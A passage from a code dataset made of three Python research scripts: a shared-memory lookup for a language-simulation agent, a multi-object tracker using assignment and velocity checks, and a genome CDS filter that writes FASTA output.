セットされる.同時に配列のどこまで値が書き込まれているのか\n もチェックする.その位置から書き込みが行われる\n\n また逆にC言語の構造体に書き込む処理も行う.\n\n 注意事項\n 1.基本的に共有メモリは単一のプロセスしかアクセスできない.\n 2.共有メモリは線形探索しかできない(と思う)\n 3.共有メモリ上の構造体にアクセスするときはctypesの仕様で構造体\n のメンバーがそのままコピーされるわけではなく,ラッパーオブジェクト\n が返される.\n 4.forループゴリ押しで探索しているが、下手に他の関数をかませると\n メモリの別の位置を参照しているみたいだから変えないでね\n \"\"\"\n\n def __init__(self, c_knowledge_array, agent_id):\n self.knowledge_array = c_knowledge_array\n self.agent_id = agent_id\n # print \"c_knowledge_array\", c_knowledge_array\n # print \"self.knowledge_array\", self.knowledge_array\n\n # 発話する単語を選ぶときに使う\n self.activewords = []\n self.inlexicon = []\n\n # word, geneの構造体リストに新しく追加する場合のindex\n self.wordinsert = 0\n self.geneinsert = 0\n\n # ***書き込みの際には利用できない***.インスタンスを作った時点での情報\n # になる.最新版というわけではない\n self.knowledgestruct = None\n self.wordstruct = None\n self.any_wordstruct = None\n self.genestruct = None\n\n for x in self.knowledge_array:\n if self.agent_id == x.id:\n self.knowledgestruct = x # ラッパーオブジェクトを取り出す\n break\n \"\"\"\n for field_name, field_type in self.knowledgestruct._fields_:\n print field_name, getattr(self.knowledgestruct, field_name)\n \"\"\"\n self.wordstruct = self.knowledgestruct.words\n\n def find_agent_knowlede(self):\n \"\"\"\n 指定されたagentの構造体を取ってくる\n \"\"\"\n return self.knowledgestruct\n\n def find_word(self, word):\n \"\"\"\n word は必ず語幹\n agentの構造体から指定されたword構造体をとってくる.\n 持っていない場合はNone\n \"\"\"\n self.word = word\n for i, x in enumerate(self.wordstruct):\n if word == x.stem:\n self.any_wordstruct = x\n\n return self.any_wordstruct\n\n def find_genes(self):\n \"\"\"\n find_wordで見つけたwordのgeneを返す\n 持っていない場合はNone\n \"\"\"\n return self.genestruct\n\n def active_words(self):\n \"\"\"active flagが立っている単語とその頻度\n \"\"\"\n\n self.activewords = [x for x in self.wordstruct\n if x.active != 0]\n self.activewords = [(x.stem, x.freq) for x in self.activewords]\n self.activewords_dict = {}\n\n for s, v in self.activewords:\n self.activewords_dict[s] = v\n return self.activewords_dict\n\n def in_lexicon_words(self):\n \"\"\"stem_in_lexフラグが立っている単語\n \"\"\"\n\n self.inlexicon = [x for x in self.wordstruct\n if x.stem_in_lex != 0]\n\n return self.inlexicon\n\n \"\"\"\n 以下書き込み用の処理\n >>> かならず任意の単語を検索した後でないとエラーになる\n >>> 書き込む可能性があるのはgene, word\n >>> 新しい過去形はどうやって保持しておく?\n\n \"\"\"\n\n def insert_gene(self, c_knowledge_array, p_bit_array, score):\n \"\"\"使用した遺伝子配列を構造体に挿入する\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n\n bit_array : python list(numpy array) like object\n\n score : Int\n\n Returns\n -------\n\n \"\"\"\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for x in self.wordstruct:\n if x.stem == self.word:\n self.genestruct = x.gene\n break\n\n used = 1\n\n c_bit_array = (c_int * len(p_bit_array))(*p_bit_array)\n\n new_gene = DataStructure.GeneStruct(\n c_bit_array,\n score,\n used\n )\n\n for i, x in enumerate(self.genestruct):\n if x.used != 1:\n # 配列のi番目から値を挿入できる\n self.geneinsert = i\n break\n\n self.genestruct[self.geneinsert] = new_gene\n\n def register_utter(self, c_knowledge_array, past_form):\n \"\"\"自分が発話した過去形を登録する\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's id ***\n\n past_form : Str\n\n \"\"\"\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for x in self.wordstruct:\n if x.stem == self.word:\n self.utter_array = x.utter\n break\n\n for x in self.utter_array:\n if x.utter == \"0\":\n setattr(x, \"utter\", past_form)\n break\n\n def register_heard(self, c_knowledge_array, past):\n \"\"\"自分が聞いた過去形を登録する\n\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's id ***\n\n past_form : Str\n\n だめ\n buf = (c_char * len(past))(*past)\n buf_ptr = cast(buf, c_char_p)\n print buf_ptr\n \"\"\"\n past_form = past\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for x in self.wordstruct:\n if x.stem == self.word:\n self.heard_array = x.heard\n break\n\n for x in self.heard_array:\n # 0の場合は何も入っていない\n if x.heard == \"0\":\n setattr(x, \"heard\", past_form)\n break\n\n def insert_wordstruct(self, c_knowledge_array, *args):\n \"\"\"聞いたことがない新しい単語が入ってきた場合に登録する\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's id ***\n\n args : tiple(stem:String, past:String, meaning:Int, freq:Int)\n\n \"\"\"\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n notsetted_field_value = [\n # Initialize filed value\n 1, # active\n 0, # stem_in_lex\n 0, # past_in_lex\n 1000 # life\n ]\n\n field_value = [x for x in args]\n field_value.extend(notsetted_field_value)\n new_word = DataStructure.WordStruct(*field_value)\n # new_word_address = addressof(new_word)\n\n for i, x in enumerate(self.wordstruct):\n if x.stem is None:\n self.wordinsert = i\n # self.insertaddres = addressof(x)\n # print self.wordinsert\n break\n\n # メモリにバイナリを書き込む方法でもうまく行く\n # ただ共有メモリのシンクロが効いているかわからないから危険\n # memmove(self.insertaddres, new_word_address, sizeof(new_word))\n # この書き込みでもうまくいく\n self.wordstruct[self.wordinsert] = new_word\n\n def overwrite_past_form(self, c_knowledge_array, new_past_form):\n \"\"\"過去形の形を変更刷る場合に呼ぶ\n word構造体のpastだけ書き換える\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's knowledge ***\n\n new_past_form : string\n\n \"\"\"\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for i, x in enumerate(self.wordstruct):\n if x.stem == self.word:\n self.wordinsert = i\n # overwrite_target_struct = x\n setattr(x, \"past\", new_past_form)\n break\n \"\"\"\n values = DataStructure.get_fields_value(overwrite_target_struct)\n values['past'] = new_past_form\n new_word = DataStructure.WordStruct()\n\n for field_name, field_type in new_word._fields_:\n setattr(new_word, field_name, values.get(field_name, 0))\n\n\n print \"new_word check\", new_word\n DataStructure.check_fields(new_word)\n self.wordstruct[self.wordinsert] = new_word\n \"\"\"\n def increment_comunicate_count(self, c_knowledge_array):\n \"\"\"コミュニケーションした回数\n \"\"\"\n for k in c_knowledge_array:\n if k.id == self.agent_id:\n c = k.communicate + 1\n setattr(k, \"communicate\", c)\n\n def increment_understand_count(self, c_knowledge_array):\n \"\"\"任意の単語の過去形が理解された回数\n \"\"\"\n for k in c_knowledge_array:\n if k.id == self.agent_id:\n w = k.words\n break\n\n for x in w:\n if x.stem == self.word:\n u = x.understand + 1\n setattr(x, \"understand\", u)\n break\n\n def decrement_wordlife(self, c_knowledge_array):\n \"\"\"Holdしているagentのすべての単語のlifeをデクリメントする.\n 最新の共有メモリを使わなければいけないので、必ず共有メモリ\n を受け取ること\n\n \"\"\"\n\n for k in c_knowledge_array:\n if k.id == self.agent_id:\n w = k.words\n break\n\n for x in w[:self.wordinsert + 1]:\n x.life = x.life - 1\n","sub_path":"KnowledgeLookup.py","file_name":"KnowledgeLookup.py","file_ext":"py","file_size_in_byte":10735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333599986","text":"#!/usr/bin/env python3\nimport os\nimport sys\n\nimport numpy as np\nimport math\nfrom scipy.spatial import distance as dist\nfrom scipy.optimize import linear_sum_assignment\n\n\ndir_to_Tracker=os.path.dirname(os.path.dirname(os.path.dirname( __file__ )))\ndir_to_Scripts = os.path.join(dir_to_Tracker,\"Scripts\") \nsys.path.append(dir_to_Scripts)\n\nfrom agfh import *\n\nclass Object_handler():\n def __init__(self,classNum):\n self.OcclusionLimit = 50\n self.Current = []\n self.Known = []\n self.Lost = []\n self.UID = 0\n self.ClassID = np.zeros(classNum,dtype = int)\n self.CurrentOrder = {\"Class\": 0, \"cx\": 1, \"cy\": 2, \"Start_x\": 3, \"Start_y\": 4, \"End_x\": 5, \\\n \"End_y\": 6, \"Score\": 7, \"Depth_X\": 8, \"Depth_Y\": 9, \"Depth_Z\": 10, \"Time\": 11, \\\n \"Current_listing\": 12} #Tilføjet time and vehicle XYZ\n self.KnownOrder = {\"UID\": 0, \"ID\": 1, \"Class\": 2, \"cx\": 3, \"cy\": 4, \"Start_x\": 5, \"Start_y\": 6, \\\n \"End_x\": 7, \"End_y\": 8, \"Score\": 9, \"Occlusion\": 10, \"Depth_X\": 11, \"Depth_Y\": 12, \"Depth_Z\": 13, \\\n \"Time\": 14, \"Current_listing\": 15, \"velocity_x\": 16, \"velocity_y\": 17, \"velocity_z\": 18} #Tilføjet time and vehicle XYZ\n self.LostOrder = {\"UID\": 0, \"ID\": 1, \"Class\": 2}\n self.Dynsta = np.zeros(classNum, dtype=bool) # Dynamic class true, Static class flass (everything is false)\n self.Dynsta[np.array([0,1])] = True # Make person and car (2) dynamic \n self.static_V = 0.5 #1.8km/h\n self.dynamic_V = 400 #10.8km/h\n # [UID, ID, class, cx, cy, Start_x, Start_y, End_x, End_y, Score, Occlusion]\n \n def add(self,Objects):\n if len(Objects) > 0:\n for i in range(0,len(Objects)):\n Start_x = int(Objects[i,0])\n Start_y = int(Objects[i,1])\n End_x = int(Objects[i,2])\n End_y = int(Objects[i,3])\n Score = Objects[i,4]\n Class = int(Objects[i,5])\n Cx = int((Start_x + End_x) / 2)\n Cy = int((Start_y + End_y) / 2)\n #Depth = Objects[i,6]\n DX = Objects[i,6][0]\n DY = Objects[i,6][1]\n DZ = Objects[i,6][2]\n Time = Objects[i,7] #Tilføjet\n Current = ([Class, Cx, Cy, Start_x, Start_y, End_x, End_y, Score, DX, DY, DZ, Time, i]) #Tilføjet time and vehicle\n self.Current.append(Current)\n self.merge()\n self.clear()\n\n def merge(self):\n ############## Case 1 ##############\n # Current == 0\n # Known == 0\n if len(self.Current) == 0:\n if len(self.Known) == 0:\n print(\"Case 1\")\n #print(\"I see nothing, I know nothing, I am nothing\")\n\n ############## Case 2 ##############\n # Current == 0 \n # Known > 0\n # No New Objects are present\n # Add one to all Occlusion values\n else:\n print(\"Case 2\")\n for i in range(0,len(self.Known)):\n self.Known[i][self.KnownOrder.get(\"Occlusion\")] += 1\n self.Known[i][self.KnownOrder.get(\"Current_listing\")] = float(\"nan\")\n\n ############## Case 3 ##############\n # Current > 0\n # Known == 0\n else:\n if len(self.Known) == 0:\n print(\"Case 3\")\n for i in range(0,len(self.Current)):\n self.upgrade(self.Current[i])\n\n ############## Case 4 ##############\n # Current > 0\n # Known > 0\n else:\n print(\"Case 4\")\n Unique_Classes = self.Unique_List([row[self.CurrentOrder.get(\"Class\")] for row in self.Current])\n Unique_Known_Classes = self.Unique_List([row[self.KnownOrder.get(\"Class\")] for row in self.Known])\n # For Loop over each Unique Class\n Current_classes = [row[self.CurrentOrder.get(\"Class\")] for row in self.Current] \n Known_classes = [row[self.KnownOrder.get(\"Class\")] for row in self.Known]\n for c in Unique_Classes:\n Current_i = [i for i, x in enumerate(Current_classes) if c == x]\n Known_i = [i for i, x in enumerate(Known_classes) if c == x]\n Current_D = []\n Known_D = []\n Estim_D = []\n Current_Time = [] #tilføjet\n Known_Time = [] #tilføjet\n UsedRow = []\n UsedCol = []\n\n for i in Current_i:\n Current_D.append([self.Current[i][self.CurrentOrder.get(\"Depth_X\")],self.Current[i][self.CurrentOrder.get(\"Depth_Y\")],self.Current[i][self.CurrentOrder.get(\"Depth_Z\")]])\n Current_Time=([self.Current[i][self.CurrentOrder.get(\"Time\")]]) #tilføjet\n\n for i in Known_i:\n Known_D.append([self.Known[i][self.KnownOrder.get(\"Depth_X\")],self.Known[i][self.KnownOrder.get(\"Depth_Y\")],self.Known[i][self.KnownOrder.get(\"Depth_Z\")]]) \n #Estim_x = self.Known[i][self.KnownOrder.get(\"Depth_X\")]+self.Known[i][self.KnownOrder.get(\"velocity_x\")]*(self.Current[i][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")])\n Estim_D.append([self.Known[i][self.KnownOrder.get(\"Depth_X\")]+self.Known[i][self.KnownOrder.get(\"velocity_x\")]*(self.Current[0][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")]), \\\n self.Known[i][self.KnownOrder.get(\"Depth_Y\")]+self.Known[i][self.KnownOrder.get(\"velocity_y\")]*(self.Current[0][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")]), \\\n self.Known[i][self.KnownOrder.get(\"Depth_Z\")]+self.Known[i][self.KnownOrder.get(\"velocity_z\")]*(self.Current[0][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")])])\n Known_Time.append([self.Known[i][self.KnownOrder.get(\"Time\")]]) #tilføjet\n\n if len(Known_D) > 0:\n # Select velocity threshold \n if self.Dynsta[c]==False:\n v_thres=self.static_V\n else:\n v_thres=self.dynamic_V\n # Calculate distance between pairs\n D = dist.cdist(np.array(Current_D), np.array(Known_D))\n E = dist.cdist(np.array(Current_D), np.array(Estim_D))\n # Calculate pairs for lowest cost \n #UsedRow, UsedCol = linear_sum_assignment(D)\n UsedRow, UsedCol = linear_sum_assignment(E)\n\n dellist = np.array([])\n for i in range(len(UsedCol)):\n # Calculate velocity of lowest cost pairs\n v_obj = (D[UsedRow[i]][UsedCol[i]])/(np.array(Current_Time)-np.array(Known_Time[UsedCol[i]]))\n # If pair exceed velocity threshold, remove pair\n if v_obj > v_thres:\n dellist = np.append(dellist,i)\n # Remove unwanted pairs\n UsedRow = np.delete(UsedRow,dellist)\n UsedCol = np.delete(UsedCol,dellist)\n \n # Updating Known to match current pairs\n for i in range(len(UsedRow)):\n Row = UsedRow[i]\n Col = UsedCol[i]\n Current_update = self.Current[Current_i[Row]]\n Known_update = self.Known[Known_i[Col]][self.KnownOrder.get(\"UID\")]\n self.update(Current_update,Known_update)\n\n # Adding new points not matched with a known points\n if len(UsedRow) < len(Current_i):\n New_Points = np.delete(Current_i,[UsedRow])\n for i in New_Points:\n self.upgrade(self.Current[i])\n\n # Add Occlusion to lost objects\n if len(UsedCol) < len(Known_i):\n Lost_Points = np.delete(Known_i,[UsedCol])\n for i in Lost_Points:\n self.Known[i][self.KnownOrder.get(\"Occlusion\")] += 1 \n self.Known[i][self.KnownOrder.get(\"Current_listing\")] = float(\"nan\")\n \n \n # Add Occlusion to all classed not found\n Unseen_Classes = Unique_Known_Classes\n for i in Unique_Classes:\n try:\n Unseen_Classes.remove(i) \n except ValueError:\n e = ValueError\n for i in Unseen_Classes:\n for j in range(0,len(self.Known)):\n if self.Known[j][self.KnownOrder.get(\"Class\")] == i:\n self.Known[j][self.KnownOrder.get(\"Occlusion\")] += 1\n self.Known[j][self.KnownOrder.get(\"Current_listing\")] = float(\"nan\")\n\n def upgrade(self,Current): #Tilføjet time and vehicle xyz\n ID, UID = self.incID(Current[self.CurrentOrder.get(\"Class\")])\n Known = [UID, ID, Current[self.CurrentOrder.get(\"Class\")], \\\n Current[self.CurrentOrder.get(\"cx\")], Current[self.CurrentOrder.get(\"cy\")], \\\n Current[self.CurrentOrder.get(\"Start_x\")], Current[self.CurrentOrder.get(\"Start_y\")], \\\n Current[self.CurrentOrder.get(\"End_x\")] ,Current[self.CurrentOrder.get(\"End_y\")], \\\n Current[self.CurrentOrder.get(\"Score\")], 0, Current[self.CurrentOrder.get(\"Depth_X\")], \\\n Current[self.CurrentOrder.get(\"Depth_Y\")], Current[self.CurrentOrder.get(\"Depth_Z\")], \\\n Current[self.CurrentOrder.get(\"Time\")], \\\n Current[self.CurrentOrder.get(\"Current_listing\")],0,0,0] \n self.Known.append(Known)\n\n def update(self,Current,Known_update):\n #Matching UID\n for i in range(0,len(self.Known)):\n if Known_update == self.Known[i][self.KnownOrder.get(\"UID\")]:\n Knownrow = i\n self.Known[Knownrow][self.KnownOrder.get(\"velocity_x\")] = (Current[self.CurrentOrder.get(\"Depth_X\")]-self.Known[Knownrow][self.KnownOrder.get(\"Depth_X\")])/(Current[self.CurrentOrder.get(\"Time\")]-self.Known[Knownrow][self.KnownOrder.get(\"Time\")])\n self.Known[Knownrow][self.KnownOrder.get(\"velocity_y\")] = (Current[self.CurrentOrder.get(\"Depth_Y\")]-self.Known[Knownrow][self.KnownOrder.get(\"Depth_Y\")])/(Current[self.CurrentOrder.get(\"Time\")]-self.Known[Knownrow][self.KnownOrder.get(\"Time\")])\n self.Known[Knownrow][self.KnownOrder.get(\"velocity_z\")] = (Current[self.CurrentOrder.get(\"Depth_Z\")]-self.Known[Knownrow][self.KnownOrder.get(\"Depth_Z\")])/(Current[self.CurrentOrder.get(\"Time\")]-self.Known[Knownrow][self.KnownOrder.get(\"Time\")])\n self.Known[Knownrow][self.KnownOrder.get(\"cx\")] = Current[self.CurrentOrder.get(\"cx\")]\n self.Known[Knownrow][self.KnownOrder.get(\"cy\")] = Current[self.CurrentOrder.get(\"cy\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Start_x\")] = Current[self.CurrentOrder.get(\"Start_x\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Start_y\")] = Current[self.CurrentOrder.get(\"Start_y\")]\n self.Known[Knownrow][self.KnownOrder.get(\"End_x\")] = Current[self.CurrentOrder.get(\"End_x\")]\n self.Known[Knownrow][self.KnownOrder.get(\"End_y\")] = Current[self.CurrentOrder.get(\"End_y\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Score\")] = Current[self.CurrentOrder.get(\"Score\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Depth_X\")] = Current[self.CurrentOrder.get(\"Depth_X\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Depth_Y\")] = Current[self.CurrentOrder.get(\"Depth_Y\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Depth_Z\")] = Current[self.CurrentOrder.get(\"Depth_Z\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Occlusion\")] = 0\n self.Known[Knownrow][self.KnownOrder.get(\"Time\")] = Current[self.CurrentOrder.get(\"Time\")] #Tilføjet\n self.Known[Knownrow][self.KnownOrder.get(\"Current_listing\")] = Current[self.CurrentOrder.get(\"Current_listing\")]\n\n def clear(self):\n self.Current = [] \n Lost_UID = []\n for i in range(0,len(self.Known)):\n if self.Known[i][self.KnownOrder.get(\"Occlusion\")] == self.OcclusionLimit:\n Lost_UID.append(self.Known[i][self.KnownOrder.get(\"UID\")])\n for i in Lost_UID:\n self.Remove(i)\n \n def incID(self,Class):\n UID = self.UID\n ClassID = self.ClassID[Class]\n self.UID += 1\n self.ClassID[Class] += 1\n return ClassID, UID\n \n def Unique_List(self, List): \n Unique_Entries = []\n for x in List: \n if x not in Unique_Entries: \n Unique_Entries.append(x)\n return Unique_Entries\n \n def Remove(self,Lost_UID):\n indexes = []\n for i in range(0,len(self.Known)):\n if self.Known[i][self.KnownOrder.get(\"UID\")] == Lost_UID:\n #Lost_P = self.Known[i]\n UID = self.Known[i][self.KnownOrder.get(\"UID\")]\n ID = self.Known[i][self.KnownOrder.get(\"ID\")]\n Class = self.Known[i][self.KnownOrder.get(\"Class\")]\n Lost = [UID, ID, Class]\n self.Lost.append(Lost)\n indexes.append(i)\n for index in sorted(indexes, reverse=True):\n del self.Known[index]\n\n","sub_path":"src/Tracker/object_handler/src/Object_handler.py","file_name":"Object_handler.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590795689","text":"#!/usr/bin/python\n\n# Script number:\t\t\t\t3.1\n# File:\t\t\t\t\t\t\t1 of 1\n# Prerequisite script(s):\n# Prerequisite file(s):\n# Description:\t\t\t\t\tFilter and write CDSs in fasta format\n# Output files:\t\t\t\t\tfilter_errors.csv, filter_errors_t4.csv, table_4_genomes_in_list.txt\n\nimport os\nimport sys\nimport imp\nimport time\nimport re\nimport shutil\nfrom datetime import timedelta\nfrom Bio import SeqIO\nfrom Bio.SeqFeature import FeatureLocation, CompoundLocation\nfrom Bio.Seq import Seq\nimport multiprocessing as mp\n\n\n#############\n# Variables #\n#############\n\nscript_name = os.path.basename(__file__)\nscript_description = \"Convert embl file to fasta format. Filter genes.\\n\"\n\nembl_directory = \"raw_files/bacteria_raw/\"\noutput_directory = \"outputs/\"\n\ngenome_sorting = output_directory + \"genome_sorting/\"\ngood_genomes = genome_sorting + \"good_genomes/\"\nt4_genomes = genome_sorting + \"t4_genomes/\"\n\noutput_fasta_directory = output_directory + 'genome_extractions/'\noutput_fasta_directory_t4 = output_directory + 'genome_extractions_t4/'\noutput_filter_directory = output_directory + 'gene_filtering/'\n\n\ngenome_list = genome_sorting + 'genome_list.csv'\ngenome_list_t4 = genome_sorting + 'genome_list_t4.csv'\n\noutput_error_file_path = output_filter_directory + 'filter_errors.csv'\noutput_error_file_path_t4 = output_filter_directory + 'filter_errors_t4.csv'\n\noutput_table_4_path = output_filter_directory + 'table_4_genomes_in_list.txt'\n\n#############\n# Functions #\n#############\n\ndef run_in_parralell(input_list, args, function_to_run, required_workers = None):\n\n\t# blank list to hold results\n\tresults = []\n\n\t\"\"\"\n\tSetup multiprocessing\n\t\"\"\"\n\n\t# Determine the number of cpus to use if the number of workers isnt defined\n\tif not required_workers:\n\t\trequired_workers = (mp.cpu_count()) - 1\n\n\t# Split the list you wish to iterate over into smaller chunks that can be parallelised\n\tchunked_input_list = [input_list[i::required_workers] for i in range(required_workers)]\n\n\t# Multiprocessing setup\n\tpool = mp.Pool(required_workers)\n\n\n\t\"\"\"\n\tIterate function over each of the chunked lists\n\t\"\"\"\n\n\tfor i in chunked_input_list:\n\t\tcurrent_args = args.copy()\n\t\tnew_args = [i]\n\n\t\tfor arg in current_args:\n\t\t\tnew_args.append(arg)\n\n\t\tprocess = pool.apply_async(function_to_run, new_args)\n\t\tresults.append(process)\n\n\t\"\"\"\n\tClose the multiprocessing threads\n\t\"\"\"\n\n\tpool.close()\n\tpool.join()\n\n\n\treturn(results)\n\n\n# Create new directory\ndef create_directory(directory_path):\n\n\tif os.path.exists(directory_path):\n\t\tprint ('Directory already exists: %s\\n' % directory_path)\n\telse:\n\t\tprint ('Making new directory: %s\\n' % directory_path)\n\t\tos.mkdir(directory_path)\n\n\n# Strictly create new directory (remove it previsouly)\ndef create_strict_directory(directory_path):\n\n\tif os.path.exists(directory_path):\n\t\tprint ('Directory already exists: %s' % directory_path)\n\t\tprint ('Removing directory')\n\t\tshutil.rmtree(directory_path)\n\t\tprint ('Making new directory: %s\\n' % directory_path)\n\t\tos.mkdir(directory_path)\n\telse:\n\t\tprint ('Making new directory: %s\\n' % directory_path)\n\t\tos.mkdir(directory_path)\n\n\n# Get the script descriptions\ndef script_misc():\n\tprint(script_name)\n\tprint(script_description)\n\n\ndef get_accession_list(genome_list_path):\n\n\taccession_list = {}\n\theader = True\n\n\twith open(genome_list_path, 'rU') as genome_file:\n\t\tfor entry in genome_file:\n\t\t\tif header:\n\t\t\t\theader = False\n\t\t\t\tcontinue\n\n\t\t\tentry_splits = entry.split(',')\n\t\t\taccession = entry_splits[3].strip('\\n')\n\t\t\taccession_list[accession] = [entry_splits[0], entry_splits[1], entry_splits[2]]\n\n\treturn accession_list\n\n\ndef get_sequence_from_raw(genome_sequence, cds_location, cds_start, cds_end, cds_strand, operator):\n\n\tcds_location_nice = ''\n\tcds_locations_nice = []\n\n\tif operator == 'join':\n\n\t\tcds_sequence = ''\n\t\tcds_locations_nice = []\n\n\t\tcds_locations = re.findall('(?<=\\{).+(?=})', str(cds_location))[0]\n\t\tcds_locations = cds_locations.split(',')\n\t\tfor location in cds_locations:\n\t\t\tlocation = location.strip(' ')\n\n\t\t\tcds_limits = location.split(':')\n\t\t\tjoin_start = int(re.findall('\\d+', cds_limits[0])[0])\n\t\t\tjoin_end = int(re.findall('\\d+', cds_limits[1])[0])\n\t\t\tjoin_strand = re.findall('(?<=\\().+(?=\\))', location)[0]\n\n\t\t\tjoin_location_nice = '%s:%s(%s);' % (join_start+1, join_end,join_strand)\n\t\t\tcds_locations_nice.append(join_location_nice)\n\n\t\t\tif join_strand == '-':\n\t\t\t\tcds_sequence += genome_sequence[join_start:join_end].reverse_complement()\n\t\t\telse:\n\t\t\t\tcds_sequence += genome_sequence[join_start:join_end]\n\n\t\tfor join_location_nice in reversed(cds_locations_nice):\n\t\t\tcds_location_nice += join_location_nice\n\n\telse:\n\t\tif cds_strand == -1:\n\t\t\tcds_sequence = genome_sequence[cds_start:cds_end].reverse_complement()\n\t\telse:\n\t\t\tcds_sequence = genome_sequence[cds_start:cds_end]\n\n\t\tcds_location_nice += '%s:%s' % (cds_start+1,cds_end)\n\n\n\treturn cds_sequence, cds_location_nice\n\n\ndef check_length_three(cds):\n\n\tif len(cds) % 3 != 0:\n\t\tfilter_check = False\n\telse:\n\t\tfilter_check = True\n\n\treturn filter_check\n\ndef check_bases(cds):\n\n\tfilter_check = True\n\tbases = ['A', 'C', 'T', 'G']\n\tfor nt in cds:\n\t\tif nt not in bases:\n\t\t\tfilter_check = False\n\n\treturn filter_check\n\ndef check_standard_stop(cds, translation_table):\n\n\tfilter_check = True\n\tstop_codons = {}\n\tstop_codons[11] = ['TAA', 'TGA', 'TAG']\n\tstop_codons[4] = ['TAA', 'TAG']\n\n\tif cds[-3:] not in stop_codons[int(translation_table)]:\n\t\tfilter_check = False\n\n\treturn filter_check\n\n\ndef check_inframe_stop(cds, translation_table):\n\n\tfilter_check = True\n\tstop_codons = {}\n\tstop_codons[11] = ['TAA', 'TGA', 'TAG']\n\tstop_codons[4] = ['TAA', 'TAG']\n\n\tfor i in range(0, len(cds)-3, 3):\n\t\tif cds[i:i+3] in stop_codons[int(translation_table)]:\n\t\t\tfilter_check = False\n\n\treturn filter_check\n\n\ndef parse_genome(accession, record_path):\n\n\trecords = 0\n\n\toutput_record = ''\n\terror_string = ''\n\n\ttranslation_table_4 = False\n\n\n\tfor seq_record in SeqIO.parse(record_path, \"embl\"):\n\n\t\tgenome_sequence = seq_record.seq\n\n\n\t\tfor seq_feature in seq_record.features:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# For each of the genome features\n\t\t\tif seq_feature.type==\"CDS\":\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Check if feature is a CDS\n\n\t\t\t\ttry:\n\t\t\t\t\tlen(seq_feature.qualifiers['translation'])==1\t\t\t\t\t\t\t\t\t# Check translation exists\n\t\t\t\t\trecords += 1\n\n\t\t\t\t\t# Extract CDS information\n\t\t\t\t\tprotein_id = seq_feature.qualifiers['protein_id'][0]\t\t\t\t\t\t\t\t\t# Protein ID\n\t\t\t\t\ttransl_table = seq_feature.qualifiers['transl_table'][0]\t\t\t\t\t\t\t\t# Translation table\n\t\t\t\t\toperator = seq_feature.location_operator\t\t\t\t\t\t\t\t\t\t\t\t# Location operator (join)\n\t\t\t\t\tcds_strand = seq_feature.strand\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Strand\n\t\t\t\t\tcds_start = seq_feature.location.nofuzzy_start\n\t\t\t\t\tcds_end = seq_feature.location.nofuzzy_end\n\t\t\t\t\tcds_location = seq_feature.location\n\n\t\t\t\t\tif transl_table == '4':\n\t\t\t\t\t\ttranslation_table_4 = True\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tpseudo = seq_feature.qualifiers['pseudo']\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tlocus_tag = seq_feature.qualifiers['locus_tag'][0]\n\t\t\t\t\texcept:\n\t\t\t\t\t\tlocus_tag = 'no_locus_tag_cds%s' % records\n\n\t\t\t\t\ttry:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# See if the cds name exists\n\t\t\t\t\t\tcds_name = seq_feature.qualifiers['gene'][0]\t\t\t\t\t\t\t\t\t\t# Gene name\n\t\t\t\t\texcept:\n\t\t\t\t\t\tcds_name = 'no_cds_qualifier_%s' % seq_feature.qualifiers['locus_tag'][0]\n\n\t\t\t\t\tcds_sequence, cds_location_nice = get_sequence_from_raw(genome_sequence, cds_location, cds_start, cds_end, cds_strand, operator)\t\t# CDS sequence\n\n\n\t\t\t\t\t# Filter cds\n\t\t\t\t\tcds_multiple_three_check = check_length_three(cds_sequence)\n\t\t\t\t\tcds_base_check = check_bases(cds_sequence)\n\t\t\t\t\tcds_check_stop = check_standard_stop(cds_sequence, transl_table)\n\t\t\t\t\tcds_inframe_stop = check_inframe_stop(cds_sequence, transl_table)\n\n\t\t\t\t\tif not cds_multiple_three_check:\n\t\t\t\t\t\terror_string += '%s,%s,1\\n' % (accession, locus_tag)\n\t\t\t\t\tif not cds_base_check:\n\t\t\t\t\t\terror_string += '%s,%s,2\\n' % (accession, locus_tag)\n\t\t\t\t\tif not cds_check_stop:\n\t\t\t\t\t\terror_string += '%s,%s,3\\n' % (accession, locus_tag)\n\t\t\t\t\tif not cds_inframe_stop:\n\t\t\t\t\t\terror_string += '%s,%s,4\\n' % (accession, locus_tag)\n\n\t\t\t\t\tcds_entry = ''\n\t\t\t\t\tif cds_multiple_three_check and cds_base_check and cds_check_stop and cds_inframe_stop:\n\t\t\t\t\t\tcds_entry = 